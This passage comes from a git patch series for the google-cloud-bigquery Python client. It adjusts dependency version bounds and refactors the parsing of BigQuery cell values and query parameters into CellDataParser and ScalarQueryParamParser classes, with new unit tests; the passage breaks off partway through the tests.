"pyarrow >= 3.0.0", - "db-dtypes >= 1.0.4, < 2.0.0dev", + "db-dtypes >= 1.0.4, < 2.0.0", ] ipywidgets = ["ipywidgets >= 7.7.1", "ipykernel >= 6.2.0"] -geopandas = ["geopandas >= 0.9.0, < 2.0dev", "Shapely >= 1.8.4, < 3.0.0dev"] +geopandas = ["geopandas >= 0.9.0, < 2.0.0", "Shapely >= 1.8.4, < 3.0.0"] ipython = ["ipython >= 7.23.1", "bigquery-magics >= 0.6.0"] -tqdm = ["tqdm >= 4.7.4, < 5.0.0dev"] +tqdm = ["tqdm >= 4.7.4, < 5.0.0"] opentelemetry = [ "opentelemetry-api >= 1.1.0", "opentelemetry-sdk >= 1.1.0", "opentelemetry-instrumentation >= 0.20b0", ] bigquery_v2 = [ - "proto-plus >= 1.22.3, < 2.0.0dev", - "protobuf >= 3.20.2, < 6.0.0dev, != 4.21.0, != 4.21.1, != 4.21.2, != 4.21.3, != 4.21.4, != 4.21.5", # For the legacy proto-based types. + "proto-plus >= 1.22.3, < 2.0.0", + "protobuf >= 3.20.2, < 7.0.0, != 4.21.0, != 4.21.1, != 4.21.2, != 4.21.3, != 4.21.4, != 4.21.5", # For the legacy proto-based types. ] all = [ "google-cloud-bigquery[bqstorage,pandas,ipywidgets,geopandas,ipython,tqdm,opentelemetry,bigquery_v2]", diff --git a/testing/constraints-3.13.txt b/testing/constraints-3.13.txt new file mode 100644 index 000000000..e69de29bb From 9acd9c15a18bb2c0ff9d12d306598a23a80a5b11 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Wed, 19 Mar 2025 10:17:38 -0500 Subject: [PATCH 076/202] chore: refactor cell data parsing to use classes for easier overrides (#2144) * chore: refactor cell data parsing to use classes for easier overrides * improve error messages with urls for valueerrors * Update tests/unit/_helpers/test_cell_data_parser.py * remove unreachable code --- google/cloud/bigquery/_helpers.py | 499 ++++++++++-------- google/cloud/bigquery/query.py | 27 +- google/cloud/bigquery/table.py | 2 +- tests/unit/_helpers/test_cell_data_parser.py | 467 ++++++++++++++++ tests/unit/_helpers/test_from_json.py | 157 ------ .../test_scalar_query_param_parser.py | 93 ++++ tests/unit/test__helpers.py | 479 ----------------- 7 files changed, 858 insertions(+), 866 deletions(-) create mode 100644 tests/unit/_helpers/test_cell_data_parser.py delete mode 100644 tests/unit/_helpers/test_from_json.py create mode 100644 tests/unit/_helpers/test_scalar_query_param_parser.py diff --git a/google/cloud/bigquery/_helpers.py b/google/cloud/bigquery/_helpers.py index d40217c4d..4ba3ccf93 100644 --- a/google/cloud/bigquery/_helpers.py +++ b/google/cloud/bigquery/_helpers.py @@ -21,8 +21,9 @@ import math import re import os +import textwrap import warnings -from typing import Optional, Union, Any, Tuple, Type +from typing import Any, Optional, Tuple, Type, Union from dateutil import relativedelta from google.cloud._helpers import UTC # type: ignore @@ -133,243 +134,305 @@ def _not_null(value, field): return value is not None or (field is not None and field.mode != "NULLABLE") -def _int_from_json(value, field): - """Coerce 'value' to an int, if set or not nullable.""" - if _not_null(value, field): - return int(value) - - -def _interval_from_json( - value: Optional[str], field -) -> Optional[relativedelta.relativedelta]: - """Coerce 'value' to an interval, if set or not nullable.""" - if not _not_null(value, field): - return None - if value is None: - raise TypeError(f"got {value} for REQUIRED field: {repr(field)}") - - parsed = _INTERVAL_PATTERN.match(value) - if parsed is None: - raise ValueError(f"got interval: '{value}' with unexpected format") - - calendar_sign = -1 if parsed.group("calendar_sign") == "-" else 1 - years = calendar_sign * int(parsed.group("years")) - months = calendar_sign * int(parsed.group("months")) - days = int(parsed.group("days")) - time_sign = -1 if parsed.group("time_sign") == "-" else 1 - hours = time_sign * int(parsed.group("hours")) - minutes = time_sign * int(parsed.group("minutes")) - seconds = time_sign * int(parsed.group("seconds")) - fraction = parsed.group("fraction") - microseconds = time_sign * int(fraction.ljust(6, "0")[:6]) if fraction else 0 - - return relativedelta.relativedelta( - years=years, - months=months, - days=days, - hours=hours, - minutes=minutes, - seconds=seconds, - microseconds=microseconds, - ) - - -def _float_from_json(value, field): - """Coerce 'value' to a float, if set or not nullable.""" - if _not_null(value, field): - return float(value) - - -def _decimal_from_json(value, field): - """Coerce 'value' to a Decimal, if set or not nullable.""" - if _not_null(value, field): - return decimal.Decimal(value) - - -def _bool_from_json(value, field): - """Coerce 'value' to a bool, if set or not nullable.""" - if _not_null(value, field): - return value.lower() in ["t", "true", "1"] - - -def _string_from_json(value, _): - """NOOP string -> string coercion""" - return value - - -def _bytes_from_json(value, field): - """Base64-decode value""" - if _not_null(value, field): - return base64.standard_b64decode(_to_bytes(value)) - - -def _timestamp_from_json(value, field): - """Coerce 'value' to a datetime, if set or not nullable.""" - if _not_null(value, field): - # value will be a integer in seconds, to microsecond precision, in UTC. - return _datetime_from_microseconds(int(value)) +class CellDataParser: + """Converter from BigQuery REST resource to Python value for RowIterator and similar classes. + See: "rows" field of + https://cloud.google.com/bigquery/docs/reference/rest/v2/tabledata/list and + https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/getQueryResults. + """ -def _timestamp_query_param_from_json(value, field): - """Coerce 'value' to a datetime, if set or not nullable. - - Args: - value (str): The timestamp. - - field (google.cloud.bigquery.schema.SchemaField): - The field corresponding to the value. + def to_py(self, resource, field): + def default_converter(value, field): + _warn_unknown_field_type(field) + return value - Returns: - Optional[datetime.datetime]: - The parsed datetime object from - ``value`` if the ``field`` is not null (otherwise it is - :data:`None`). - """ - if _not_null(value, field): - # Canonical formats for timestamps in BigQuery are flexible. See: - # g.co/cloud/bigquery/docs/reference/standard-sql/data-types#timestamp-type - # The separator between the date and time can be 'T' or ' '. - value = value.replace(" ", "T", 1) - # The UTC timezone may be formatted as Z or +00:00. - value = value.replace("Z", "") - value = value.replace("+00:00", "") - - if "." in value: - # YYYY-MM-DDTHH:MM:SS.ffffff - return datetime.datetime.strptime(value, _RFC3339_MICROS_NO_ZULU).replace( - tzinfo=UTC - ) + converter = getattr( + self, f"{field.field_type.lower()}_to_py", default_converter + ) + if field.mode == "REPEATED": + return [converter(item["v"], field) for item in resource] else: - # YYYY-MM-DDTHH:MM:SS - return datetime.datetime.strptime(value, _RFC3339_NO_FRACTION).replace( - tzinfo=UTC + return converter(resource, field) + + def bool_to_py(self, value, field): + """Coerce 'value' to a bool, if set or not nullable.""" + if _not_null(value, field): + # TODO(tswast): Why does _not_null care if the field is NULLABLE or + # REQUIRED? Do we actually need such client-side validation? + if value is None: + raise TypeError(f"got None for required boolean field {field}") + return value.lower() in ("t", "true", "1") + + def boolean_to_py(self, value, field): + """Coerce 'value' to a bool, if set or not nullable.""" + return self.bool_to_py(value, field) + + def integer_to_py(self, value, field): + """Coerce 'value' to an int, if set or not nullable.""" + if _not_null(value, field): + return int(value) + + def int64_to_py(self, value, field): + """Coerce 'value' to an int, if set or not nullable.""" + return self.integer_to_py(value, field) + + def interval_to_py( + self, value: Optional[str], field + ) -> Optional[relativedelta.relativedelta]: + """Coerce 'value' to an interval, if set or not nullable.""" + if not _not_null(value, field): + return None + if value is None: + raise TypeError(f"got {value} for REQUIRED field: {repr(field)}") + + parsed = _INTERVAL_PATTERN.match(value) + if parsed is None: + raise ValueError( + textwrap.dedent( + f""" + Got interval: '{value}' with unexpected format. + Expected interval in canonical format of "[sign]Y-M [sign]D [sign]H:M:S[.F]". + See: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#interval_type + for more information. + """ + ), ) - else: - return None + calendar_sign = -1 if parsed.group("calendar_sign") == "-" else 1 + years = calendar_sign * int(parsed.group("years")) + months = calendar_sign * int(parsed.group("months")) + days = int(parsed.group("days")) + time_sign = -1 if parsed.group("time_sign") == "-" else 1 + hours = time_sign * int(parsed.group("hours")) + minutes = time_sign * int(parsed.group("minutes")) + seconds = time_sign * int(parsed.group("seconds")) + fraction = parsed.group("fraction") + microseconds = time_sign * int(fraction.ljust(6, "0")[:6]) if fraction else 0 + + return relativedelta.relativedelta( + years=years, + months=months, + days=days, + hours=hours, + minutes=minutes, + seconds=seconds, + microseconds=microseconds, + ) -def _datetime_from_json(value, field): - """Coerce 'value' to a datetime, if set or not nullable. + def float_to_py(self, value, field): + """Coerce 'value' to a float, if set or not nullable.""" + if _not_null(value, field): + return float(value) - Args: - value (str): The timestamp. - field (google.cloud.bigquery.schema.SchemaField): - The field corresponding to the value. + def float64_to_py(self, value, field): + """Coerce 'value' to a float, if set or not nullable.""" + return self.float_to_py(value, field) - Returns: - Optional[datetime.datetime]: - The parsed datetime object from - ``value`` if the ``field`` is not null (otherwise it is - :data:`None`). - """ - if _not_null(value, field): - if "." in value: - # YYYY-MM-DDTHH:MM:SS.ffffff - return datetime.datetime.strptime(value, _RFC3339_MICROS_NO_ZULU) - else: - # YYYY-MM-DDTHH:MM:SS - return datetime.datetime.strptime(value, _RFC3339_NO_FRACTION) - else: - return None + def numeric_to_py(self, value, field): + """Coerce 'value' to a Decimal, if set or not nullable.""" + if _not_null(value, field): + return decimal.Decimal(value) + def bignumeric_to_py(self, value, field): + """Coerce 'value' to a Decimal, if set or not nullable.""" + return self.numeric_to_py(value, field) -def _date_from_json(value, field): - """Coerce 'value' to a datetime date, if set or not nullable""" - if _not_null(value, field): - # value will be a string, in YYYY-MM-DD form. - return _date_from_iso8601_date(value) + def string_to_py(self, value, _): + """NOOP string -> string coercion""" + return value + def geography_to_py(self, value, _): + """NOOP string -> string coercion""" + return value -def _time_from_json(value, field): - """Coerce 'value' to a datetime date, if set or not nullable""" - if _not_null(value, field): - if len(value) == 8: # HH:MM:SS - fmt = _TIMEONLY_WO_MICROS - elif len(value) == 15: # HH:MM:SS.micros - fmt = _TIMEONLY_W_MICROS + def bytes_to_py(self, value, field): + """Base64-decode value""" + if _not_null(value, field): + return base64.standard_b64decode(_to_bytes(value)) + + def timestamp_to_py(self, value, field): + """Coerce 'value' to a datetime, if set or not nullable.""" + if _not_null(value, field): + # value will be a integer in seconds, to microsecond precision, in UTC. + return _datetime_from_microseconds(int(value)) + + def datetime_to_py(self, value, field): + """Coerce 'value' to a datetime, if set or not nullable. + + Args: + value (str): The timestamp. + field (google.cloud.bigquery.schema.SchemaField): + The field corresponding to the value. + + Returns: + Optional[datetime.datetime]: + The parsed datetime object from + ``value`` if the ``field`` is not null (otherwise it is + :data:`None`). + """ + if _not_null(value, field): + if "." in value: + # YYYY-MM-DDTHH:MM:SS.ffffff + return datetime.datetime.strptime(value, _RFC3339_MICROS_NO_ZULU) + else: + # YYYY-MM-DDTHH:MM:SS + return datetime.datetime.strptime(value, _RFC3339_NO_FRACTION) else: - raise ValueError("Unknown time format: {}".format(value)) - return datetime.datetime.strptime(value, fmt).time() + return None + def date_to_py(self, value, field): + """Coerce 'value' to a datetime date, if set or not nullable""" + if _not_null(value, field): + # value will be a string, in YYYY-MM-DD form. + return _date_from_iso8601_date(value) + + def time_to_py(self, value, field): + """Coerce 'value' to a datetime date, if set or not nullable""" + if _not_null(value, field): + if len(value) == 8: # HH:MM:SS + fmt = _TIMEONLY_WO_MICROS + elif len(value) == 15: # HH:MM:SS.micros + fmt = _TIMEONLY_W_MICROS + else: + raise ValueError( + textwrap.dedent( + f""" + Got {repr(value)} with unknown time format. + Expected HH:MM:SS or HH:MM:SS.micros. See + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#time_type + for more information. + """ + ), + ) + return datetime.datetime.strptime(value, fmt).time() + + def record_to_py(self, value, field): + """Coerce 'value' to a mapping, if set or not nullable.""" + if _not_null(value, field): + record = {} + record_iter = zip(field.fields, value["f"]) + for subfield, cell in record_iter: + record[subfield.name] = self.to_py(cell["v"], subfield) + return record + + def struct_to_py(self, value, field): + """Coerce 'value' to a mapping, if set or not nullable.""" + return self.record_to_py(value, field) + + def json_to_py(self, value, field): + """Coerce 'value' to a Pythonic JSON representation.""" + if _not_null(value, field): + return json.loads(value) + else: + return None -def _record_from_json(value, field): - """Coerce 'value' to a mapping, if set or not nullable.""" - if _not_null(value, field): - record = {} - record_iter = zip(field.fields, value["f"]) - for subfield, cell in record_iter: - record[subfield.name] = _field_from_json(cell["v"], subfield) - return record + def _range_element_to_py(self, value, field_element_type): + """Coerce 'value' to a range element value.""" + # Avoid circular imports by importing here. + from google.cloud.bigquery import schema + if value == "UNBOUNDED": + return None + if field_element_type.element_type in _SUPPORTED_RANGE_ELEMENTS: + return self.to_py( + value, + schema.SchemaField("placeholder", field_element_type.element_type), + ) + else: + raise ValueError( + textwrap.dedent( + f""" + Got unsupported range element type: {field_element_type.element_type}. + Exptected one of {repr(_SUPPORTED_RANGE_ELEMENTS)}. See: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#declare_a_range_type + for more information. + """ + ), + ) -def _json_from_json(value, field): - """Coerce 'value' to a Pythonic JSON representation.""" - if _not_null(value, field): - return json.loads(value) - else: - return None + def range_to_py(self, value, field): + """Coerce 'value' to a range, if set or not nullable. + + Args: + value (str): The literal representation of the range. + field (google.cloud.bigquery.schema.SchemaField): + The field corresponding to the value. + + Returns: + Optional[dict]: + The parsed range object from ``value`` if the ``field`` is not + null (otherwise it is :data:`None`). + """ + if _not_null(value, field): + if _RANGE_PATTERN.match(value): + start, end = value[1:-1].split(", ") + start = self._range_element_to_py(start, field.range_element_type) + end = self._range_element_to_py(end, field.range_element_type) + return {"start": start, "end": end} + else: + raise ValueError( + textwrap.dedent( + f""" + Got unknown format for range value: {value}. + Expected format '[lower_bound, upper_bound)'. See: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#range_with_literal + for more information. + """ + ), + ) -def _range_element_from_json(value, field): - """Coerce 'value' to a range element value.""" - if value == "UNBOUNDED": - return None - if field.element_type in _SUPPORTED_RANGE_ELEMENTS: - return _CELLDATA_FROM_JSON[field.element_type](value, field.element_type) - else: - raise ValueError(f"Unsupported range element type: {field.element_type}") +CELL_DATA_PARSER = CellDataParser() -def _range_from_json(value, field): - """Coerce 'value' to a range, if set or not nullable. +class ScalarQueryParamParser(CellDataParser): + """Override of CellDataParser to handle the differences in the response from query params. - Args: - value (str): The literal representation of the range. - field (google.cloud.bigquery.schema.SchemaField): - The field corresponding to the value. - - Returns: - Optional[dict]: - The parsed range object from ``value`` if the ``field`` is not - null (otherwise it is :data:`None`). + See: "value" field of + https://cloud.google.com/bigquery/docs/reference/rest/v2/QueryParameter#QueryParameterValue """ - if _not_null(value, field): - if _RANGE_PATTERN.match(value): - start, end = value[1:-1].split(", ") - start = _range_element_from_json(start, field.range_element_type) - end = _range_element_from_json(end, field.range_element_type) - return {"start": start, "end": end} - else: - raise ValueError(f"Unknown format for range value: {value}") - else: - return None + def timestamp_to_py(self, value, field): + """Coerce 'value' to a datetime, if set or not nullable. + + Args: + value (str): The timestamp. + + field (google.cloud.bigquery.schema.SchemaField): + The field corresponding to the value. + + Returns: + Optional[datetime.datetime]: + The parsed datetime object from + ``value`` if the ``field`` is not null (otherwise it is + :data:`None`). + """ + if _not_null(value, field): + # Canonical formats for timestamps in BigQuery are flexible. See: + # g.co/cloud/bigquery/docs/reference/standard-sql/data-types#timestamp-type + # The separator between the date and time can be 'T' or ' '. + value = value.replace(" ", "T", 1) + # The UTC timezone may be formatted as Z or +00:00. + value = value.replace("Z", "") + value = value.replace("+00:00", "") + + if "." in value: + # YYYY-MM-DDTHH:MM:SS.ffffff + return datetime.datetime.strptime( + value, _RFC3339_MICROS_NO_ZULU + ).replace(tzinfo=UTC) + else: + # YYYY-MM-DDTHH:MM:SS + return datetime.datetime.strptime(value, _RFC3339_NO_FRACTION).replace( + tzinfo=UTC + ) + else: + return None -# Parse BigQuery API response JSON into a Python representation. -_CELLDATA_FROM_JSON = { - "INTEGER": _int_from_json, - "INT64": _int_from_json, - "INTERVAL": _interval_from_json, - "FLOAT": _float_from_json, - "FLOAT64": _float_from_json, - "NUMERIC": _decimal_from_json, - "BIGNUMERIC": _decimal_from_json, - "BOOLEAN": _bool_from_json, - "BOOL": _bool_from_json, - "STRING": _string_from_json, - "GEOGRAPHY": _string_from_json, - "BYTES": _bytes_from_json, - "TIMESTAMP": _timestamp_from_json, - "DATETIME": _datetime_from_json, - "DATE": _date_from_json, - "TIME": _time_from_json, - "RECORD": _record_from_json, - "JSON": _json_from_json, - "RANGE": _range_from_json, -} -_QUERY_PARAMS_FROM_JSON = dict(_CELLDATA_FROM_JSON) -_QUERY_PARAMS_FROM_JSON["TIMESTAMP"] = _timestamp_query_param_from_json +SCALAR_QUERY_PARAM_PARSER = ScalarQueryParamParser() def _field_to_index_mapping(schema): @@ -377,18 +440,6 @@ def _field_to_index_mapping(schema): return {f.name: i for i, f in enumerate(schema)} -def _field_from_json(resource, field): - def default_converter(value, field): - _warn_unknown_field_type(field) - return value - - converter = _CELLDATA_FROM_JSON.get(field.field_type, default_converter) - if field.mode == "REPEATED": - return [converter(item["v"], field) for item in resource] - else: - return converter(resource, field) - - def _row_tuple_from_json(row, schema): """Convert JSON row data to row with appropriate types. @@ -410,7 +461,7 @@ def _row_tuple_from_json(row, schema): row_data = [] for field, cell in zip(schema, row["f"]): - row_data.append(_field_from_json(cell["v"], field)) + row_data.append(CELL_DATA_PARSER.to_py(cell["v"], field)) return tuple(row_data) diff --git a/google/cloud/bigquery/query.py b/google/cloud/bigquery/query.py index f1090a7dc..8745c09f5 100644 --- a/google/cloud/bigquery/query.py +++ b/google/cloud/bigquery/query.py @@ -18,11 +18,11 @@ import copy import datetime import decimal -from typing import Any, Optional, Dict, Union +from typing import Any, cast, Optional, Dict, Union from google.cloud.bigquery.table import _parse_schema_resource +from google.cloud.bigquery import _helpers from google.cloud.bigquery._helpers import _rows_from_json -from google.cloud.bigquery._helpers import _QUERY_PARAMS_FROM_JSON from google.cloud.bigquery._helpers import _SCALAR_VALUE_TO_JSON_PARAM from google.cloud.bigquery._helpers import _SUPPORTED_RANGE_ELEMENTS @@ -571,6 +571,9 @@ def from_api_repr(cls, resource: dict) -> "ScalarQueryParameter": Returns: google.cloud.bigquery.query.ScalarQueryParameter: Instance """ + # Import here to avoid circular imports. + from google.cloud.bigquery import schema + name = resource.get("name") type_ = resource["parameterType"]["type"] @@ -578,7 +581,9 @@ def from_api_repr(cls, resource: dict) -> "ScalarQueryParameter": # from the back-end - the latter omits it for None values. value = resource.get("parameterValue", {}).get("value") if value is not None: - converted = _QUERY_PARAMS_FROM_JSON[type_](value, None) + converted = _helpers.SCALAR_QUERY_PARAM_PARSER.to_py( + value, schema.SchemaField(cast(str, name), type_) + ) else: converted = None @@ -693,13 +698,20 @@ def _from_api_repr_struct(cls, resource): @classmethod def _from_api_repr_scalar(cls, resource): + """Converts REST resource into a list of scalar values.""" + # Import here to avoid circular imports. + from google.cloud.bigquery import schema + name = resource.get("name") array_type = resource["parameterType"]["arrayType"]["type"] parameter_value = resource.get("parameterValue", {}) array_values = parameter_value.get("arrayValues", ()) values = [value["value"] for value in array_values] converted = [ - _QUERY_PARAMS_FROM_JSON[array_type](value, None) for value in values + _helpers.SCALAR_QUERY_PARAM_PARSER.to_py( + value, schema.SchemaField(name, array_type) + ) + for value in values ] return cls(name, array_type, converted) @@ -850,6 +862,9 @@ def from_api_repr(cls, resource: dict) -> "StructQueryParameter": Returns: google.cloud.bigquery.query.StructQueryParameter: Instance """ + # Import here to avoid circular imports. + from google.cloud.bigquery import schema + name = resource.get("name") instance = cls(name) type_resources = {} @@ -877,7 +892,9 @@ def from_api_repr(cls, resource: dict) -> "StructQueryParameter": converted = ArrayQueryParameter.from_api_repr(struct_resource) else: value = value["value"] - converted = _QUERY_PARAMS_FROM_JSON[type_](value, None) + converted = _helpers.SCALAR_QUERY_PARAM_PARSER.to_py( + value, schema.SchemaField(cast(str, name), type_) + ) instance.struct_values[key] = converted return instance diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 4d79d60da..f139e44ad 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -3533,7 +3533,7 @@ def _row_iterator_page_columns(schema, response): def get_column_data(field_index, field): for row in rows: - yield _helpers._field_from_json(row["f"][field_index]["v"], field) + yield _helpers.CELL_DATA_PARSER.to_py(row["f"][field_index]["v"], field) for field_index, field in enumerate(schema): columns.append(get_column_data(field_index, field)) diff --git a/tests/unit/_helpers/test_cell_data_parser.py b/tests/unit/_helpers/test_cell_data_parser.py new file mode 100644 index 000000000..14721a26c --- /dev/null +++ b/tests/unit/_helpers/test_cell_data_parser.py @@ -0,0 +1,467 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import base64 +import datetime +import decimal +import json + +from dateutil.relativedelta import relativedelta +import pytest + +import google.cloud.bigquery.schema + + +def create_field(mode="NULLABLE", type_="IGNORED", name="test_field", **kwargs): + return google.cloud.bigquery.schema.SchemaField(name, type_, mode=mode, **kwargs) + + +@pytest.fixture +def mut(): + from google.cloud.bigquery import _helpers + + return _helpers + + +@pytest.fixture +def object_under_test(mut): + return mut.CELL_DATA_PARSER + + +ALL_TYPES = { + "BOOL", + "BOOLEAN", + "BYTES", + "INTEGER", + "INT64", + "INTERVAL", + "FLOAT", + "FLOAT64", + "NUMERIC", + "BIGNUMERIC", + "STRING", + "GEOGRAPHY", + "TIMESTAMP", + "DATETIME", + "DATE", + "TIME", + "RECORD", + "STRUCT", + "JSON", + "RANGE", +} + +TYPES_WITH_CLIENT_SIDE_NULL_VALIDATION = ALL_TYPES - { + "STRING", + "GEOGRAPHY", +} + + +@pytest.mark.parametrize( + "type_", + list(sorted(ALL_TYPES)), +) +def test_to_py_w_none_nullable(object_under_test, type_): + assert object_under_test.to_py(None, create_field("NULLABLE", type_)) is None + + +@pytest.mark.parametrize("type_", list(sorted(TYPES_WITH_CLIENT_SIDE_NULL_VALIDATION))) +def test_to_py_w_none_required(object_under_test, type_): + with pytest.raises(TypeError): + object_under_test.to_py(None, create_field("REQUIRED", type_)) + + +def test_interval_to_py_w_invalid_format(object_under_test): + with pytest.raises(ValueError, match="NOT_AN_INTERVAL"): + object_under_test.interval_to_py("NOT_AN_INTERVAL", create_field()) + + +@pytest.mark.parametrize( + ("value", "expected"), + ( + ("0-0 0 0:0:0", relativedelta()), + # SELECT INTERVAL X YEAR + ("-10000-0 0 0:0:0", relativedelta(years=-10000)), + ("-1-0 0 0:0:0", relativedelta(years=-1)), + ("1-0 0 0:0:0", relativedelta(years=1)), + ("10000-0 0 0:0:0", relativedelta(years=10000)), + # SELECT INTERVAL X MONTH + ("-0-11 0 0:0:0", relativedelta(months=-11)), + ("-0-1 0 0:0:0", relativedelta(months=-1)), + ("0-1 0 0:0:0", relativedelta(months=1)), + ("0-11 0 0:0:0", relativedelta(months=11)), + # SELECT INTERVAL X DAY + ("0-0 -3660000 0:0:0", relativedelta(days=-3660000)), + ("0-0 -1 0:0:0", relativedelta(days=-1)), + ("0-0 1 0:0:0", relativedelta(days=1)), + ("0-0 3660000 0:0:0", relativedelta(days=3660000)), + # SELECT INTERVAL X HOUR + ("0-0 0 -87840000:0:0", relativedelta(hours=-87840000)), + ("0-0 0 -1:0:0", relativedelta(hours=-1)), + ("0-0 0 1:0:0", relativedelta(hours=1)), + ("0-0 0 87840000:0:0", relativedelta(hours=87840000)), + # SELECT INTERVAL X MINUTE + ("0-0 0 -0:59:0", relativedelta(minutes=-59)), + ("0-0 0 -0:1:0", relativedelta(minutes=-1)), + ("0-0 0 0:1:0", relativedelta(minutes=1)), + ("0-0 0 0:59:0", relativedelta(minutes=59)), + # SELECT INTERVAL X SECOND + ("0-0 0 -0:0:59", relativedelta(seconds=-59)), + ("0-0 0 -0:0:1", relativedelta(seconds=-1)), + ("0-0 0 0:0:1", relativedelta(seconds=1)), + ("0-0 0 0:0:59", relativedelta(seconds=59)), + # SELECT (INTERVAL -1 SECOND) / 1000000 + ("0-0 0 -0:0:0.000001", relativedelta(microseconds=-1)), + ("0-0 0 -0:0:59.999999", relativedelta(seconds=-59, microseconds=-999999)), + ("0-0 0 -0:0:59.999", relativedelta(seconds=-59, microseconds=-999000)), + ("0-0 0 0:0:59.999", relativedelta(seconds=59, microseconds=999000)), + ("0-0 0 0:0:59.999999", relativedelta(seconds=59, microseconds=999999)), + # Test with multiple digits in each section. + ( + "32-11 45 67:16:23.987654", + relativedelta( + years=32, + months=11, + days=45, + hours=67, + minutes=16, + seconds=23, + microseconds=987654, + ), + ), + ( + "-32-11 -45 -67:16:23.987654", + relativedelta( + years=-32, + months=-11, + days=-45, + hours=-67, + minutes=-16, + seconds=-23, + microseconds=-987654, + ), + ), + # Test with mixed +/- sections. + ( + "9999-9 -999999 9999999:59:59.999999", + relativedelta( + years=9999, + months=9, + days=-999999, + hours=9999999, + minutes=59, + seconds=59, + microseconds=999999, + ), + ), + # Test with fraction that is not microseconds. + ("0-0 0 0:0:42.", relativedelta(seconds=42)), + ("0-0 0 0:0:59.1", relativedelta(seconds=59, microseconds=100000)), + ("0-0 0 0:0:0.12", relativedelta(microseconds=120000)), + ("0-0 0 0:0:0.123", relativedelta(microseconds=123000)), + ("0-0 0 0:0:0.1234", relativedelta(microseconds=123400)), + # Fractional seconds can cause rounding problems if cast to float. See: + # https://github.com/googleapis/python-db-dtypes-pandas/issues/18 + ("0-0 0 0:0:59.876543", relativedelta(seconds=59, microseconds=876543)), + ( + "0-0 0 01:01:01.010101", + relativedelta(hours=1, minutes=1, seconds=1, microseconds=10101), + ), + ( + "0-0 0 09:09:09.090909", + relativedelta(hours=9, minutes=9, seconds=9, microseconds=90909), + ), + ( + "0-0 0 11:11:11.111111", + relativedelta(hours=11, minutes=11, seconds=11, microseconds=111111), + ), + ( + "0-0 0 19:16:23.987654", + relativedelta(hours=19, minutes=16, seconds=23, microseconds=987654), + ), + # Nanoseconds are not expected, but should not cause error. + ("0-0 0 0:0:00.123456789", relativedelta(microseconds=123456)), + ("0-0 0 0:0:59.87654321", relativedelta(seconds=59, microseconds=876543)), + ), +) +def test_interval_to_py_w_string_values(object_under_test, value, expected): + got = object_under_test.interval_to_py(value, create_field()) + assert got == expected + + +def test_integer_to_py_w_string_value(object_under_test): + coerced = object_under_test.integer_to_py("42", object()) + assert coerced == 42 + + +def test_integer_to_py_w_float_value(object_under_test): + coerced = object_under_test.integer_to_py(42.0, object()) + assert coerced == 42 + + +def test_json_to_py_w_json_field(object_under_test): + data_field = create_field("REQUIRED", "data", "JSON") + + value = json.dumps( + {"v": {"key": "value"}}, + ) + + expected_output = {"v": {"key": "value"}} + coerced_output = object_under_test.json_to_py(value, data_field) + assert coerced_output == expected_output + + +def test_json_to_py_w_string_value(object_under_test): + coerced = object_under_test.json_to_py('"foo"', create_field()) + assert coerced == "foo" + + +def test_float_to_py_w_string_value(object_under_test): + coerced = object_under_test.float_to_py("3.1415", object()) + assert coerced == 3.1415 + + +def test_float_to_py_w_float_value(object_under_test): + coerced = object_under_test.float_to_py(3.1415, object()) + assert coerced == 3.1415 + + +def test_numeric_to_py_w_string_value(object_under_test): + coerced = object_under_test.numeric_to_py("3.1415", object()) + assert coerced == decimal.Decimal("3.1415") + + +def test_numeric_to_py_w_float_value(object_under_test): + coerced = object_under_test.numeric_to_py(3.1415, object()) + # There is no exact float representation of 3.1415. + assert coerced == decimal.Decimal(3.1415) + + +def test_bool_to_py_w_value_t(object_under_test): + coerced = object_under_test.bool_to_py("T", object()) + assert coerced is True + + +def test_bool_to_py_w_value_true(object_under_test): + coerced = object_under_test.bool_to_py("True", object()) + assert coerced is True + + +def test_bool_to_py_w_value_1(object_under_test): + coerced = object_under_test.bool_to_py("1", object()) + assert coerced is True + + +def test_bool_to_py_w_value_other(object_under_test): + coerced = object_under_test.bool_to_py("f", object()) + assert coerced is False + + +def test_string_to_py_w_string_value(object_under_test): + coerced = object_under_test.string_to_py("Wonderful!", object()) + assert coerced == "Wonderful!" + + +def test_bytes_to_py_w_base64_encoded_bytes(object_under_test): + expected = b"Wonderful!" + encoded = base64.standard_b64encode(expected) + coerced = object_under_test.bytes_to_py(encoded, object()) + assert coerced == expected + + +def test_bytes_to_py_w_base64_encoded_text(object_under_test): + expected = b"Wonderful!" + encoded = base64.standard_b64encode(expected).decode("ascii") + coerced = object_under_test.bytes_to_py(encoded, object()) + assert coerced == expected + + +def test_timestamp_to_py_w_string_int_value(object_under_test): + from google.cloud._helpers import _EPOCH + + coerced = object_under_test.timestamp_to_py("1234567", object()) + assert coerced == _EPOCH + datetime.timedelta(seconds=1, microseconds=234567) + + +def test_timestamp_to_py_w_int_value(object_under_test): + from google.cloud._helpers import _EPOCH + + coerced = object_under_test.timestamp_to_py(1234567, object()) + assert coerced == _EPOCH + datetime.timedelta(seconds=1, microseconds=234567) + + +def test_datetime_to_py_w_string_value(object_under_test): + coerced = object_under_test.datetime_to_py("2016-12-02T18:51:33", object()) + assert coerced == datetime.datetime(2016, 12, 2, 18, 51, 33) + + +def test_datetime_to_py_w_microseconds(object_under_test): + coerced = object_under_test.datetime_to_py("2015-05-22T10:11:12.987654", object()) + assert coerced == datetime.datetime(2015, 5, 22, 10, 11, 12, 987654) + + +def test_date_to_py_w_string_value(object_under_test): + coerced = object_under_test.date_to_py("1987-09-22", object()) + assert coerced == datetime.date(1987, 9, 22) + + +def test_time_to_py_w_string_value(object_under_test): + coerced = object_under_test.time_to_py("12:12:27", object()) + assert coerced == datetime.time(12, 12, 27) + + +def test_time_to_py_w_subsecond_string_value(object_under_test): + coerced = 